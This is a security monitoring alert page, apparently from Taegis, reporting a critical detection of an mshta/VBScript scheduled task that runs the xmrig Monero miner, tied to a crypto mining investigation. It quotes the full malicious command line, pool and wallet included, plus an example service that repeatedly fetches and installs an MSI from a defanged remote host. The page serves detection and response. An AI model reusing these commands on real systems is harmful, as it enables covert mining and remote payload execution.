Alerts  /  Persistent Creation of a Windows Scripting Host Automation Object

Persistent Creation of a Windows Scripting Host Automation Object

Is this alert valuable?

Details

Status:
Status Reason:
None
First Activity:
2024/03/06 12:16:59 UTC (22 days ago)
Last Activity:
2024/03/06 12:16:59 UTC (22 days ago)
Inserted At:
2024/03/06 12:29:24 UTC (22 days ago)
First Investigated:
2024/03/06 17:28:42 UTC (22 days ago)
First Resolved:
2024/03/15 18:22:04 UTC (13 days ago)
Severity:
Critical (0.99)
Threat Score:
9.9
Tenant:
Smiths Cogwheels, Inc. (96072)
Detector:
Taegis Watchlist
Tactics:
Execution, Persistence, Privilege Escalation, Defense Evasion
Techniques:
Scheduled Task/Job (T1053)
Visual Basic (T1059.005)
Mshta (T1218.005)
Windows Service (T1543.003)
Registry Run Keys / Startup Folder (T1547.001)
Sensor Types:
Taegis Taegis
Confidence:
100%
Hostname:
PCUS0382
Agent/Sensor ID:
432988c18aef458a8a8a95f56a98eba6
Investigations:
2024-03-06 - [CS] Crypto Mining Investigation - PCUS0382
Occurrence Count:
1
Grouped by (Group Key):
96072:app:event-filter:persistence:12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1:432988c18aef458a8a8a95f56a98eba6:[mshta vbscript:CreateObject("Wscript.Shell").("C:\Users\brandon.perry\xmrig.exe --donate-level 1 -o monerohash.com:2222 -u 84XFxjQVYoJjQBeyfbcYBgJ1tw4cgywGyTp12nQw3mSKZctgMYuPGRH1y2LuBAS8yyT8ZX2NDS3CXbfFAxdXQJwAGMoMDSq -p x -k",0,true)(window.close)]:2024-02-29

Affected Agents  (1)

PCUS0382
Last Updated:
2024/03/28 07:17:16 UTC
OS Distributor:
Microsoft
OS Family:
WINDOWS
OS Version:
Windows 10
Most Recent Address:
172.16.20.11 

Open alerts (0) for Related Entities

Open alerts within past 72 hours from alert creation
NO DATA
Agent/Sensor ID (432988c18aef458a8a8a95f56a98eba6)
0
Hostname (PCUS0382)
0
Similar Alert Titles based on Rule ID (12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1)
0

Closed alerts (99) for Related Entities

Closed alerts within past 30 days from alert creation
True Positive Malicious (55)Suppressed (44)
Agent/Sensor ID (432988c18aef458a8a8a95f56a98eba6)
24
2
26
Hostname (PCUS0382)
30
42
72
Similar Alert Titles based on Rule ID (12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1)
1
1

Open or closed investigations (6) for Related Entities

Open or closed investigations within past 30 days
File (mshta)
2
Host (432988c18aef458a8a8a95f56a98eba6)
2
Task Name (MSOFFICEER)
2
Alert Description
Counter Threat Unit™
A persistence event associated with a Windows Scripting Host Automation Object being created was identified. This may indicate that an adversary is attempting to frequently execute malicious content. Example: > Service Name: SMMq > Display Name: SMMq > Description: > Type: SERVICE_WIN32_OWN_PROCESS > Start Type: SERVICE_AUTO_START > Image Path: mshta.exe vbscript:createobject("wscript.shell").run("Cmd.exe /c for /l %i in (1 1 66) do (Msiexec /i Hxxp://Gk.Vwxqv.Xyz/SMB1.jpg /Q)",0)(window.close)

External References

No external references for this alert.

First Event Details

Persistence

SCHEDULED_TASK mshta vbscript:CreateObject("Wscript.Shell").("C:\Users\brandon.perry\xmrig.exe --donate-level 1 -o monerohash.com:2222 -u 84XFxjQVYoJjQBeyfbcYBgJ1tw4cgywGyTp12nQw3mSKZctgMYuPGRH1y2LuBAS8yyT8ZX2NDS3CXbfFAxdXQJwAGMoMDSq -p x -k",0,true)(window.close)

Event Time:
2024/03/06 12:16:59 UTC · 22 days ago
Ingest Time:
2024/03/06 12:29:15 UTC · 22 days ago
Category:
SCHEDULED_TASK
Operation:
ADDED
Hostname:
Taegis
PCUS0382
Sensor ID:
432988c18aef458a8a8a95f56a98eba6
Tenant:
(96072)